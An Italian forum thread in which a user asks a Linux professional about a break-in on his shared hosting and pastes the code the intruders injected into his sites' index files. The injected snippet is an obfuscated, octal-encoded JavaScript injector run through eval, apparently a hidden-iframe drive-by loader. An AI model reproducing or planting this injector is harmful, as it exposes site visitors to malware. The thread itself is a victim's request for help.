Chiedete a me!

Collapse
X
 
  • Filter
  • Ora
  • Show
Clear All
new posts
  • lucrus
    Bodyweb Member
    • May 2013
    • 10
    • 0
    • 0
    • Send PM

    Chiedete a me!

    Ragazzi è fantastico, un forum come questo che dedica uno spazio apposta ai sistemi unix like!
    Peccato solo che mi sembri piuttosto deserto...

    Allora facciamo così, io in materia di fitness sono ignorante e infatti mi sono registrato per fare la sanguisuga di vostri consigli , ma in termini di linux/unix sono un professionista (inteso, di mestiere faccio il professionista in campo linux e sono pure docente in vari corsi), quindi se avete dubbi non abbiate timore a chiedermi. Ah certo, poi magari non so rispondervi, questo può comunque capitare...
  • Sean
    Csar
    • Sep 2007
    • 120555
    • 3,393
    • 3,447
    • Italy [IT]
    • In piedi tra le rovine
    • Send PM

    #2
    Spostiamo in Super Digital...la sezione Home Unix è ormai fuori uso.
    ...ma di noi
    sopra una sola teca di cristallo
    popoli studiosi scriveranno
    forse, tra mille inverni
    «nessun vincolo univa questi morti
    nella necropoli deserta»

    C. Campo - Moriremo Lontani


    Commenta

    • Belch Warrior
      Bodyweb Advanced
      • Feb 2008
      • 1109
      • 80
      • 9
      • Bologna
      • Send PM

      #3
      che ne pensi dei ripetuti attacchi code injection sui server apache linux di questi ultimi giorni? Soluzioni? Protezioni?

      Commenta

      • lucrus
        Bodyweb Member
        • May 2013
        • 10
        • 0
        • 0
        • Send PM

        #4
        Non mi risulta siano stati riportati picchi di code injection negli ultimi giorni sui server Apache, l'ultimo di cui sapevo era di dicembre 2012. Hai il link ad un blog che ne parli?

        Commenta

        • Belch Warrior
          Bodyweb Advanced
          • Feb 2008
          • 1109
          • 80
          • 9
          • Bologna
          • Send PM

          #5
          sono entrati il 25 maggio sul mio hosting su cui ho diversi domini...

          hanno aggiunto un pezzo di codice su tutti i file index.html sui siti html, index.php sugli altri, e dove c'erano cms hanno fatto i danni maggiori, sui wordpress hanno toccato solo index.php, sui jooml hanno toccato index.php e hanno aggiunto un file php, mentre sui prestashop hano fatto molto casino, toccando moltissimi php e .js

          Commenta

          • lucrus
            Bodyweb Member
            • May 2013
            • 10
            • 0
            • 0
            • Send PM

            #6
            Più che un problema di Apache, è più probabile che abbiano sfruttato una falla di qualche estensione dei CMS. A seconda di quanto è grave la falla, potrebbero anche averne usata una sola per fare i danni a quel CMS e attraverso quella anche a tutti gli altri.
            Come sei messo ad aggiornamenti di sicurezza? Che distro usi? Dal server è possibile navigare? I vari CMS hanno molte estensioni? Sono aggiornate? Hai accesso di root al server o solo FTP?

            Commenta

            • Belch Warrior
              Bodyweb Advanced
              • Feb 2008
              • 1109
              • 80
              • 9
              • Bologna
              • Send PM

              #7
              e' un hosting condiviso... nel senso che quello che io vedo come "root" in realta' consente l'accesso ai miei domini, ma non alla root vera del server, ed ogni sottodirectory corrisponde ad un dominio...

              la falla comunque non si e' capito a cosa sia dovuta, perche' hanno toccato tutti i domini, hanno aggiunto del codice javascript criptato in base64...

              questo qua:

              #bf760a#
              echo " <script type=\"text/javascript\" language=\"javascript\" > asd=function(){d.body++};a=(\"44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44 ,177,21,16,44,172,145,166,44,153,157,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,17 0,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,153,157,62,1 67,166,147,44,101,44,53,154,170,170,164,76,63,63,150,155,161,163,162,151,175,62,166,171,63,147,162,1 70,62,164,154,164,53,77,21,16,44,153,157,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,4 4,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,153,157,62,167,170,175,160,151,62,146,163 ,166,150,151,166,44,101,44,53,64,53,77,21,16,44,153,157,62,167,170,175,160,151,62,154,151,155,153,15 4,170,44,101,44,53,65,164,174,53,77,21,16,44,153,157,62,167,170,175,160,151,62,173,155,150,170,154,4 4,101,44,53,65,164,174,53,77,21,16,44,153,157,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53 ,65,164,174,53,77,21,16,44,153,157,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53, 77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,15 1,162,170,106,175,115,150,54,53,153,157,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62, 173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,153,157,140,53,102,100,63,150,155,17 2,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,1 06,175,115,150,54,53,153,157,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,153,157,55,77,2 1,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,5 4,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110, 145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,1 51,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151 ,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160, 44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,16 4,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,5 4,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,16 1,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101 ,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,7 7,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170 ,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,4 4,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113, 151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,1 45,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,1 74,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44, 101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16, 44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45 ,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,16 2,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16 ,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145 ,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145 ,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162, 150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150, 44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,15 7,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145, 164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166, 155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145 ,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21, 16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,5 5,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167 ,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,17 6,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16\"[\"split\"](\",\"));ss=eval(\"S\"+\"tr\"+\"ing\");d=document;for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window[\"document\"])eval(ss.fromCharCode.apply(ss,a));</script>";


              #/bf760a#

              Commenta

              Working...
              X